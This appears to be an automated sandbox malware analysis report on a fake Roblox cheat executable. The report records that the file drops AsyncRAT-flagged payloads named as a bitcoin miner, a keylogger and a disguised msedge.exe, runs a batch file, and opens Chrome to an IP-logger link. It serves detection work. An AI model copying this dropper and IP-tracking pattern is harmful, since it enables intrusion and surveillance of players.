            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1516990822.000000000479D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508776431.000000000479D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64
            Source: RobloxPlayerInstaller_9F112.log.4.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper
            Source: RobloxPlayerInstaller_9F112.log.4.drString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.00000000047F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperads
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1517491839.00000000047FB000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.00000000047F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperate
            Source: RobloxPlayerInstaller.exe, 00000004.00000002.1517491839.00000000047FB000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.00000000047F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperwnloads
            Source: chromecache_71.10.drString found in binary or memory: https://counter.yadro.ru/hit?
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: https://curl.se/docs/alt-svc.html
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: https://curl.se/docs/hsts.html
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: https://curl.se/docs/http-cookies.html
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516172847.000000000255F000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509897327.000000000255D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: https://ecsv2.roblox.com/client/pbe
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drString found in binary or memory: https://ecsv2.roblox.com/client/pbeTelemetryV2UrlRobloxTelemetrySendByBatchSizeRobloxTelemetryBatchS
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516172847.000000000255F000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509897327.000000000255D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecsv2.roblox.com/client/pbees
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmp, cacert.pem.4.dr, RobloxPlayerInstaller.exe.0.drString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/cert
            Source: chromecache_71.10.drString found in binary or memory: https://iplogger.org/
            Source: chromecache_71.10.drString found in binary or memory: https://iplogger.org/preview/7c00c9b3d049350da3aca75cf5f83229
            Source: chromecache_71.10.drString found in binary or memory: https://iplogger.org/privacy/
            Source: chromecache_71.10.drString found in binary or memory: https://iplogger.org/rules/
            Source: RobloxPlayerInstaller.exe.0.drString found in binary or memory: https://s3.amazonaws.com/
            Source: RobloxPlayerInstaller.exe.0.drString found in binary or memory: https://setup.rbxcdn.com
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1509281680.00000000047B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517091060.00000000047B6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509159312.00000000047AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509602105.00000000047B5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508502616.00000000047A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1508083550.00000000047C3000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61119 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 61120 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61119
            Source: unknownNetwork traffic detected: HTTP traffic on port 61123 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61120
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61121
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 61122 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61123
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61125
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61121 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 61125 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.9:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.3.187.198:443 -> 192.168.2.9:61119 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.9:61121 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.9:61122 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.9:61123 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to log keystrokes (.Net Source)
            Source: BitCoin_miner.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout
            Source: msedge.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E1C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6E7E1C2F0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E249280_2_00007FF6E7E24928
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E1F9300_2_00007FF6E7E1F930
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E407540_2_00007FF6E7E40754
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E2A4AC0_2_00007FF6E7E2A4AC
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E334840_2_00007FF6E7E33484
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E3B1900_2_00007FF6E7E3B190
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E31F200_2_00007FF6E7E31F20
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E3CE880_2_00007FF6E7E3CE88
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E15E240_2_00007FF6E7E15E24
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E4C8380_2_00007FF6E7E4C838
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E148400_2_00007FF6E7E14840
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E176C00_2_00007FF6E7E176C0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E525500_2_00007FF6E7E52550
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E2B5340_2_00007FF6E7E2B534
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E353F00_2_00007FF6E7E353F0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E1A3100_2_00007FF6E7E1A310
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E1C2F00_2_00007FF6E7E1C2F0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E172880_2_00007FF6E7E17288
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E2126C0_2_00007FF6E7E2126C
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E321D00_2_00007FF6E7E321D0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E2F1800_2_00007FF6E7E2F180
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E520800_2_00007FF6E7E52080
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E2AF180_2_00007FF6E7E2AF18
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E407540_2_00007FF6E7E40754
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E38DF40_2_00007FF6E7E38DF4
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E32D580_2_00007FF6E7E32D58
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E48C1C0_2_00007FF6E7E48C1C
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E34B980_2_00007FF6E7E34B98
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E2BB900_2_00007FF6E7E2BB90
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E25B600_2_00007FF6E7E25B60
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E55AF80_2_00007FF6E7E55AF8
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E32AB00_2_00007FF6E7E32AB0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E11AA40_2_00007FF6E7E11AA4
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E4FA940_2_00007FF6E7E4FA94
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E21A480_2_00007FF6E7E21A48
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E489A00_2_00007FF6E7E489A0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E2C96C0_2_00007FF6E7E2C96C
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E339640_2_00007FF6E7E33964
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\ msedge.exe E85AF6A36635490B2FC2793B50C7EBC841DA95BC202A5FC9E7A4DBB17F172A2B
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe 79750B0F34A49A75406A0D7D6949AFD83DF2B2FF946E35A94AEA6BFE1D399599
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Keyloger.exe 8BC3BD8F0FF442D3C83DA8ED7DE13C8E44D095823E2480465BE866C08F7E8700
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe 3B8FCD52686095049B1563FBB6BA0BF73113A01B13C303BEBCB36D8339A1519F
            Source: cheat_roblox.exe, 00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs cheat_roblox.exe
            Source: cheat_roblox.exe, 00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameX.exe4 vs cheat_roblox.exe
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRoblox.exeH vs cheat_roblox.exe
            Source: 00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: BitCoin_miner.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: BitCoin_miner.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: BitCoin_miner.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.0.dr, tMXwX3tWlMuOZgJ.csCryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.0.dr, dtVFTVK0Ux3SN1R.csCryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.0.dr, dtVFTVK0Ux3SN1R.csCryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: BitCoin_miner.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: BitCoin_miner.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: BitCoin_miner.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: BitCoin_miner.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal56.troj.spyw.evad.winEXE@24/21@20/14
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E1B6D8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF6E7E1B6D8
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E38624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF6E7E38624
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeFile created: C:\Program Files (x86)\RobloxJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeFile created: C:\Users\user\AppData\Local\RobloxJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
            Source: C:\Users\user\Desktop\cheat_roblox.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_4795703Jump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "
            Source: cheat_roblox.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\cheat_roblox.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: cheat_roblox.exeReversingLabs: Detection: 59%
            Source: C:\Users\user\Desktop\cheat_roblox.exeFile read: C:\Users\user\Desktop\cheat_roblox.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\cheat_roblox.exe "C:\Users\user\Desktop\cheat_roblox.exe"
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe "C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,10681821834965854716,2612252034697891369,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "Jump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe "C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
